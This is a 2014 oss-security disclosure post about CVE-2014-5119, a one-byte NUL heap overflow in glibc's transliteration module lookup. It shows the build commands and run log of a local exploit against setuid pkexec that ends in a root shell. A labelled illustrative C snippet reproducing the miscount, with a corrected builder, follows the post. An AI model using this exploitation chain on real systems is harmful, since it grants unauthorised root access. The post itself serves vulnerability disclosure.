List:       oss-security
Subject:    [oss-security] CVE-2014-5119 glibc __gconv_translit_find() exploit
From:       Tavis Ormandy <taviso () google ! com>
Date:       2014-08-26 2:00:15
Message-ID: CAJ_zFk+bKENpjHtgf63Kick8SM_sTo0RWTjo1MVejtTgU5RV4g () mail ! gmail ! com

List, back in July, I described CVE-2014-5119, a fiendish single-fixed-byte
heap metadata overflow in the glibc internal routine
__gconv_translit_find().

This is caused by the file extension being incorrectly appended to the
transliteration module filename. The result is one too few bytes are
allocated, and a single nul byte is written out of bounds. This issue
affects real programs that are typically default installed and setuid root.

Despite explaining that my research suggests this is exploitable, it
appears there has been general skepticism that single-fixed-byte overflows
are still exploitable with modern allocator metadata hardening.

As a result, the issue has been largely dismissed and downgraded in
severity. As little progress has been made in resolving the issue thus far,
we're publishing a proof of concept today. This exploit is specific to
Fedora 20 32-bit, but the issue is not specific to Fedora, and exploitation
on other systems and platforms is possible.

This issue is complex, and fiendishly difficult to exploit. Thanks to Chris
Evans for his heap expertise and insight. Some more information is
available on our team blog.

http://googleprojectzero.blogspot.com/2014/08/the-poisoned-nul-byte-2014-edition.html

$ make clean
rm -f pkexploit pty *.o a.out *.so
[taviso@localhost glibc]$ make
cc -ggdb3 -O0 -Wno-multichar -std=gnu99 -D_OPEN_TRANSLIT_OFF=0x00023320 -ldl  pkexploit.c   -o pkexploit
cc -ggdb3 -O0 -Wno-multichar -std=gnu99 -D_OPEN_TRANSLIT_OFF=0x00023320 -ldl  pty.c   -o pty
cc -ggdb3 -O0 -Wno-multichar -std=gnu99 -D_OPEN_TRANSLIT_OFF=0x00023320  -c -o exploit.o exploit.c
cc exploit.o -fPIC -shared -o exploit.so
Execute pkexploit to attempt exploitation.
[taviso@localhost glibc]$ ./pkexploit
[*] ---------------------------------------------------
[*] CVE-2014-5119 glibc __gconv_translit_find() exploit
[*] ------------------------ taviso & scarybeasts -----
[*] Attempting to invoke pseudo-pty helper (this will take a few seconds)...
[*] Read 7295 bytes of output from pseudo-pty helper, parsing...
[*] pseudo-pty helper succeeded
[*] attempting to parse libc fatal error message...
[*] discovered chunk pointer from `corrupted double-lin...`, => 0x507e3658
[*] attempting to parse the libc maps dump...
[*] found libc.so mapped @0x40215000
[*] expecting libc.so bss to begin at 0x406c7000
[*] successfully located first morecore chunk w/tag @0x407d6000
[*] allocating space for argument structure...
[*] creating command string...
[*] creating a tls_dtor_list node...
[*] open_translit() symbol will be at 0x40238320
[*] offsetof(struct known_trans, fname) => 32
[*] appending `./exploit.so` to list node
[*] building parameter list...
[*] anticipating tls_dtor_list to be at 0x406c82d4
[*] execvpe(pkexec...)...
Error accessing / : File name too long
uid=0(root) gid=1000(taviso) groups=0(root),10(wheel),1000(taviso)
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh-4.2# exit
exit
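The allocation miscount the message describes, as an added illustration that is not code from the post, the attached exploit or glibc: a constructed cache entry with its module path stored inline, a size computation that forgets the terminator, a replay of the copy that makes the single out-of-bounds NUL observable, and the corrected builder. `struct module_entry` and the function names are constructed stand-ins, not glibc's `struct known_trans` or its routines.

```c
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed stand-in for a cache entry holding its module path inline; not
 * glibc's struct known_trans, only the shape that matters for the bug. */
struct module_entry {
    struct module_entry *next;
    char fname[];            /* "<name><ext>\0" is copied here */
};
/* The miscount: header + name + extension, with no byte for the terminating
 * NUL. The correct size is exactly one byte more, which is the whole bug. */
size_t buggy_alloc_size(const char *name, const char *ext) {
    return offsetof(struct module_entry, fname) + strlen(name) + strlen(ext);
}
/* Replays the buggy copy into an arena of buggy_alloc_size plus one sentinel byte,
 * so the stray write is observable without UB. Returns the sentinel: 0 = hit. */
unsigned char buggy_copy_sentinel(const char *name, const char *ext) {
    size_t sz = buggy_alloc_size(name, ext);
    unsigned char *arena = malloc(sz + 1);
    if (arena == NULL) return 0xFF;
    arena[sz] = 0xAA;                        /* first byte past the "allocation" */
    struct module_entry *e = (struct module_entry *)arena;
    memcpy(e->fname, name, strlen(name));
    strcpy(e->fname + strlen(name), ext);    /* ext fits; its NUL hits arena[sz] */
    unsigned char sentinel = arena[sz];
    free(arena);
    return sentinel;
}

/* Corrected builder: allocate the full size and copy with an explicit bound. */
struct module_entry *module_entry_new(const char *name, const char *ext) {
    size_t fname_sz = strlen(name) + strlen(ext) + 1;
    struct module_entry *e = malloc(offsetof(struct module_entry, fname) + fname_sz);
    if (e == NULL) return NULL;
    e->next = NULL;
    int n = snprintf(e->fname, fname_sz, "%s%s", name, ext);
    if (n < 0 || (size_t)n >= fname_sz) { free(e); return NULL; }   /* truncated */
    return e;
}
/* Builds an entry with the corrected code and checks the path and its NUL. */
int fixed_builder_ok(const char *name, const char *ext, const char *expect) {
    struct module_entry *e = module_entry_new(name, ext);
    int ok = e != NULL && strcmp(e->fname, expect) == 0
             && e->fname[strlen(name) + strlen(ext)] == '\0';
    free(e);
    return ok;
}
```

With a real allocator the byte at `arena[sz]` is the next chunk's metadata rather than a sentinel, which is why a single zero byte there matters.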


["CVE-2014-5119.tar.gz" (application/x-gzip)]
